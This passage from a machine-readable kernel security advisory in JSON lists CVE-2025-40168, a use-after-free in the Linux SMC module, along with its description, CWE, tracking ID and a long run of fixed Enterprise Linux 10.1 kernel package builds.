"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: drm/sched: Fix potential double free in drm_sched_job_add_resv_dependencies"
},
{
"cve": "CVE-2025-40168",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2025-11-12T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2414482"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u2019s SMC (Shared Memory Communication) module: in smc_clc_prfx_match(), the function is called from smc_listen_work() without proper RCU or RTNL protection. The code previously used sk_dst_get(sk)-\u003edev, which can lead to a use-after-free (UAF) condition if the sk\u2019s destination is freed concurrently.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: smc: Use __sk_dst_get() and dst_dev_rcu() in smc_clc_prfx_match()",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
